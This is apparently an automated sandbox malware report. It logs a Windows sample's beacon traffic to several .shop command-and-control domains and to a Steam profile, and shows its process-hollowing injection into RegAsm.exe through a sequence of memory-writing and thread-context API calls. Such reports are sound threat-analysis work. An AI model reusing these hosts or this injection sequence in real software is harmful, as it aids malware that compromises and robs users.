                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:43 UTC265OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: stogeneratmns.shop
                                                                    2024-09-26 07:58:43 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:43 UTC772INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=uuddpsq26rp1cnuo3lhg7uvmuc; expires=Mon, 20 Jan 2025 01:45:22 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q31jCLB5UTDGqzmhYPzgtdKxNLaVv1pur5OUIHrXfzRrIR1j7WY7EGjpOI%2FmQtBL8ouhKzW4CtvlfPjdLD1bbz78ilDXyw%2FQORgPtp6K%2B0GktioIPnLZW5UXW7whpexcLMFVJVQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5e1ae5e15af-EWR
                                                                    2024-09-26 07:58:43 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649718172.67.208.1394435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:44 UTC263OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: reinforcenh.shop
                                                                    2024-09-26 07:58:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:44 UTC770INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=delcjp55k36p7kkhtb8risq4oh; expires=Mon, 20 Jan 2025 01:45:23 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbQBCp7wAtYUVqjkV1Kbbyzu3J7LI%2BumyK%2FGX01GJPsPXhnzuqWybQS5n7xSjlZmEV8KYpeebFodGg%2FPCmJ4w3fkGjC4zOEwUN%2FZ%2B7v4MotcKAgkhue8eS6gXIZzJxAXIYpl"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5e78c3e41bd-EWR
                                                                    2024-09-26 07:58:44 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.649719104.102.49.2544435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:45 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Host: steamcommunity.com
                                                                    2024-09-26 07:58:45 UTC1870INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    Cache-Control: no-cache
                                                                    Date: Thu, 26 Sep 2024 07:58:45 GMT
                                                                    Content-Length: 34668
                                                                    Connection: close
                                                                    Set-Cookie: sessionid=a8f98625ba21e124e1c92715; Path=/; Secure; SameSite=None
                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                    2024-09-26 07:58:45 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                    2024-09-26 07:58:46 UTC16384INData Raw: 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75
                                                                    Data Ascii: supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu
                                                                    2024-09-26 07:58:46 UTC3768INData Raw: 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61
                                                                    Data Ascii: w more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div cla
                                                                    2024-09-26 07:58:46 UTC2INData Raw: 6c 3e
                                                                    Data Ascii: l>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.649720172.67.189.24435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:46 UTC262OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: performenj.shop
                                                                    2024-09-26 07:58:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:47 UTC768INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=t57on9n7u2dv5go476s3qhna4m; expires=Mon, 20 Jan 2025 01:45:25 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NbsnPFdGgLKPmp%2B6Ahts4WhXbExomnBeG9kNlRx8AAUz2V8xEFrmVyz8PKR0eeFlR44SH6K%2FYwTsEQ6jfM9kACMg6bu5VHECqucOhP6%2B0sgGoAc9Y2U5A9muCaqXbCXzWPA%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5f58881430a-EWR
                                                                    2024-09-26 07:58:47 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:03:58:33
                                                                    Start date:26/09/2024
                                                                    Path:C:\Users\user\Desktop\3ZD5tEC5DH.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\3ZD5tEC5DH.exe"
                                                                    Imagebase:0x1e0000
                                                                    File size:374'784 bytes
                                                                    MD5 hash:149131A90F99225E6C7E28A06164DD9A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:03:58:33
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:03:58:35
                                                                    Start date:26/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    Imagebase:0x950000
                                                                    File size:65'440 bytes
                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:37.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:24%
                                                                      Total number of Nodes:25
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 512 c00988 513 c009aa 512->513 514 c00ad6 513->514 518 c01270 513->518 522 c01268 513->522 526 c01330 513->526 519 c012bb VirtualProtectEx 518->519 521 c012ff 519->521 521->514 523 c012bb VirtualProtectEx 522->523 525 c012ff 523->525 525->514 527 c01337 526->527 528 c012ca VirtualProtectEx 526->528 527->514 529 c012ff 528->529 529->514 543 c0097a 544 c009aa 543->544 545 c00ad6 544->545 546 c01270 VirtualProtectEx 544->546 547 c01330 VirtualProtectEx 544->547 548 c01268 VirtualProtectEx 544->548 546->545 547->545 548->545 530 26a2151 536 26a2189 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 530->536 532 26a2366 WriteProcessMemory 533 26a23ab 532->533 534 26a23ed WriteProcessMemory Wow64SetThreadContext ResumeThread 533->534 535 26a23b0 WriteProcessMemory 533->535 535->533 536->532

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_00C00B40 1 Function_00C001C0 2 Function_00C004C1 3 Function_00C00244 4 Function_00C00444 5 Function_00C004C5 6 Function_00C00148 7 Function_00C000C8 8 Function_00C00548 9 Function_00C00848 10 Function_00C00BC8 11 Function_00C004C9 12 Function_00C0004D 13 Function_00C00450 14 Function_00C00154 15 Function_00C000D4 16 Function_00C00254 17 Function_00C001D5 18 Function_00C00555 19 Function_00C00A57 19->0 19->8 20 Function_00C00C58 19->20 34 Function_00C01268 19->34 38 Function_00C01270 19->38 76 Function_00C00530 19->76 77 Function_00C01330 19->77 82 Function_00C0053C 19->82 21 Function_00C008D8 22 Function_00C00559 23 Function_00C0045D 24 Function_00C0055D 25 Function_00C004DF 26 Function_00C00F5F 36 Function_00C0026C 26->36 27 Function_00C00260 28 Function_00C00461 29 Function_00C00561 30 Function_00C000E4 31 Function_00C00165 32 Function_00C00465 33 Function_00C008E8 35 Function_00C00469 37 Function_00C0046D 39 Function_00C00070 40 Function_00C000F0 41 Function_00C00471 42 Function_00C010F4 42->36 43 Function_00C00475 44 Function_00C00178 45 Function_00C00479 46 Function_00C004F9 47 Function_00C0097A 47->0 47->8 47->20 47->34 47->38 69 Function_00C00524 47->69 47->76 47->77 47->82 48 Function_026A2151 49 Function_00C0027C 50 Function_00C0047D 51 Function_00C004FD 52 Function_00C00100 53 Function_00C00080 54 Function_026A1FAA 55 Function_00C00501 56 Function_00C00988 56->0 56->8 56->20 56->34 56->38 56->69 56->76 56->77 56->82 57 Function_00C00188 58 Function_00C00208 59 Function_00C0010C 60 Function_00C00090 61 Function_00C00214 62 Function_00C01216 63 Function_00C00198 64 Function_00C00498 65 Function_00C0011C 66 Function_00C0121C 66->36 67 Function_026A1D37 68 Function_00C000A0 70 Function_00C00224 71 Function_00C010A6 72 Function_00C001A8 73 Function_00C0012C 74 Function_00C010AC 74->36 75 Function_00C000B0 76->36 78 Function_00C001B4 79 Function_00C00234 80 Function_00C0013C 81 Function_00C000BC 82->36

                                                                      Executed Functions

                                                                      Function 026A2151 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,026A20C3,026A20B3), ref: 026A22C0
                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026A22D3
                                                                      • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 026A22F1
                                                                      • ReadProcessMemory.KERNELBASE(0000009C,?,026A2107,00000004,00000000), ref: 026A2315
                                                                      • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 026A2340
                                                                      • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 026A2398
                                                                      • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 026A23E3
                                                                      • WriteProcessMemory.KERNELBASE(0000009C,-00000008,?,00000004,00000000), ref: 026A2421
                                                                      • Wow64SetThreadContext.KERNEL32(000000A0,025B0000), ref: 026A245D
                                                                      • ResumeThread.KERNELBASE(000000A0), ref: 026A246C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2135714061.00000000026A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_26a1000_3ZD5tEC5DH.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                      • API String ID: 2687962208-1257834847
                                                                      • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                      • Instruction ID: 508fdef02a9037ca231f2971fbbd50b1ed86b2232b45d9a2c7ab2c931199e676
                                                                      • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                      • Instruction Fuzzy Hash: C1B1D57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94
                                                                      Function 00C01330 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 23 c01330-c01335 24 c01337-c0138a 23->24 25 c012ca-c012fd VirtualProtectEx 23->25 29 c01396-c013cb 24->29 30 c0138c-c01394 24->30 26 c01304-c01325 25->26 27 c012ff 25->27 27->26 34 c013d4-c013e8 29->34 35 c013cd-c013d3 29->35 30->29 35->34
                                                                      APIs
                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C012F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2135604598.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_3ZD5tEC5DH.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ac329fd58ba110ce1420a2289742fab62410e99e4b8ca8d25b4a16a53e4c53d7
                                                                      • Instruction ID: 863e375cdc03a50fcdce6b455b4d5ab32fec19d362d5f30805f7c4a684ba044b
                                                                      • Opcode Fuzzy Hash: ac329fd58ba110ce1420a2289742fab62410e99e4b8ca8d25b4a16a53e4c53d7
                                                                      • Instruction Fuzzy Hash: BB3148B2901259DFDF11CF99D844BDEFBF0BF88314F14811AE918AB291D3749914CBA1
                                                                      Function 00C01268 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 37 c01268-c012fd VirtualProtectEx 40 c01304-c01325 37->40 41 c012ff 37->41 41->40
                                                                      APIs
                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C012F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2135604598.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_3ZD5tEC5DH.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 52b05f0b3f665903aff29eea09c3c2ac381137d5f749f86a9012afe79e38df0b
                                                                      • Instruction ID: f593687180ef78493b0f20babe4bff270b9fe816a8f80c72822f46b0f5189eca
                                                                      • Opcode Fuzzy Hash: 52b05f0b3f665903aff29eea09c3c2ac381137d5f749f86a9012afe79e38df0b
                                                                      • Instruction Fuzzy Hash: A62125B1905259DFDB10CFAAC880ADEFBF0FF88310F14842EE919A7250C7759905CBA1
                                                                      Function 00C01270 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 44 c01270-c012fd VirtualProtectEx 47 c01304-c01325 44->47 48 c012ff 44->48 48->47
                                                                      APIs
                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C012F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2135604598.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c00000_3ZD5tEC5DH.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 96b94cc9b735a01151933232074044cdda93ab8dcad2fd28ba854528e73ac227
                                                                      • Instruction ID: cf7dd1e84c35228019a220bef850e93f29ba964fcd13027761e2b5e64b9da886
                                                                      • Opcode Fuzzy Hash: 96b94cc9b735a01151933232074044cdda93ab8dcad2fd28ba854528e73ac227
                                                                      • Instruction Fuzzy Hash: CC21E2B1901259DFDB10DFAAC881ADEFBF4FF88710F10842AE919A7250C775A910CBA5

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:75%
                                                                      Total number of Nodes:36
                                                                      Total number of Limit Nodes:8
                                                                      execution_graph 20507 40d2c0 20508 40d2c9 20507->20508 20509 40d2d1 GetInputState 20508->20509 20510 40d4ae ExitProcess 20508->20510 20511 40d2de 20509->20511 20512 40d2e6 GetCurrentThreadId GetCurrentProcessId 20511->20512 20513 40d4a4 20511->20513 20514 40d311 20512->20514 20513->20510 20518 40ed90 20514->20518 20516 40d49b 20516->20513 20522 412290 CoInitialize 20516->20522 20520 40edc4 20518->20520 20519 40ee76 LoadLibraryExW 20521 40ee8b 20519->20521 20520->20519 20521->20516 20523 447600 20529 447624 20523->20529 20525 447a4e 20526 4479ab 20525->20526 20528 447560 LdrInitializeThunk 20525->20528 20527 44797e 20527->20525 20527->20526 20532 447560 LdrInitializeThunk 20527->20532 20528->20525 20529->20525 20529->20526 20529->20527 20531 447560 LdrInitializeThunk 20529->20531 20531->20527 20532->20525 20533 44a7e0 20535 44a7f0 20533->20535 20534 44a93e 20535->20534 20537 447560 LdrInitializeThunk 20535->20537 20537->20534 20538 444282 20539 444302 RtlFreeHeap 20538->20539 20540 444308 20538->20540 20541 444290 20538->20541 20539->20540 20541->20539 20542 447ede 20543 447bb0 20542->20543 20545 447d03 20542->20545 20544 447cf3 20543->20544 20548 447560 LdrInitializeThunk 20543->20548 20547 447c71 20548->20547

                                                                      Executed Functions

                                                                      Function 00410480 Relevance: 25.4, Strings: 20, Instructions: 435COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 410480-4106db 1 41070d-410733 0->1 2 4106dd-4106df 0->2 7 4108f1-410958 1->7 8 410760-410790 1->8 9 4108c5-4108c9 1->9 10 410a04-410a18 1->10 11 4107f6-410818 1->11 12 41073a-410743 1->12 13 4107ed-4107f1 1->13 14 4108ce-4108ea 1->14 3 4106e0-41070b call 411bb0 2->3 3->1 15 41098b-410993 7->15 16 41095a 7->16 20 410792 8->20 21 4107cb-4107e6 8->21 22 410b52 9->22 44 410a1f-410a28 10->44 18 41084b-41087b 11->18 19 41081a 11->19 12->8 17 410b5c-410b63 13->17 14->7 14->10 23 410ac0-410ad1 14->23 24 410b20 14->24 25 410b40 14->25 26 410aa3 14->26 27 410b25-410b2c 14->27 28 410a86-410a9c call 446fa0 14->28 29 410b86-410b8d 14->29 30 410b4b 14->30 31 410a4a-410a65 14->31 32 410a2f-410a43 14->32 33 410ab0-410ab8 14->33 34 410b10 14->34 35 410b33 14->35 36 410b12 14->36 37 410af6-410b07 14->37 38 410b19 14->38 39 410b39-410b3f 14->39 40 410ad8-410af0 14->40 42 4109b1-4109c0 15->42 43 410995-41099f 15->43 41 410960-410989 call 411da0 16->41 60 410b6d-410b7b 17->60 50 4108a6-4108af 18->50 51 41087d-41087f 18->51 47 410820-410849 call 411d20 19->47 46 4107a0-4107c9 call 411c20 20->46 21->7 21->9 21->10 21->11 21->13 21->14 21->23 21->24 21->25 21->26 21->27 21->28 21->29 21->30 21->31 21->32 21->33 21->34 21->35 21->36 21->37 21->38 21->39 21->40 22->17 23->40 24->27 25->30 26->33 27->25 27->30 27->35 27->39 28->23 28->24 28->25 28->26 28->27 28->29 28->30 28->33 28->34 28->35 28->36 28->37 28->38 28->39 28->40 48 410b94 29->48 49 410b96-410ba5 29->49 30->22 62 410a6c-410a7f 31->62 32->23 32->24 32->25 32->26 32->27 32->28 32->29 32->30 32->31 32->33 32->34 32->35 32->36 32->37 32->38 32->39 32->40 33->34 36->38 37->34 38->24 39->25 40->37 41->15 55 4109c2-4109c4 42->55 56 4109e5-4109fd 42->56 54 4109a0-4109af 43->54 44->23 44->24 44->25 44->26 44->27 44->28 44->29 44->30 44->31 44->32 44->33 44->34 44->35 44->36 44->37 44->38 44->39 44->40 46->21 47->18 48->49 70 4108b5-4108be 50->70 63 410880-4108a4 call 411ca0 51->63 54->42 54->54 66 4109d0-4109e1 55->66 56->10 60->7 60->9 60->10 60->11 60->13 60->14 60->23 60->24 60->25 60->26 60->27 60->28 60->29 60->30 60->31 60->32 60->33 60->34 60->35 60->36 60->37 60->38 60->39 60->40 62->23 62->24 62->25 62->26 62->27 62->28 62->29 62->30 62->33 62->34 62->35 62->36 62->37 62->38 62->39 62->40 63->50 66->66 71 4109e3 66->71 70->7 70->9 70->10 70->14 70->23 70->24 70->25 70->26 70->27 70->28 70->29 70->30 70->31 70->32 70->33 70->34 70->35 70->36 70->37 70->38 70->39 70->40 71->56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
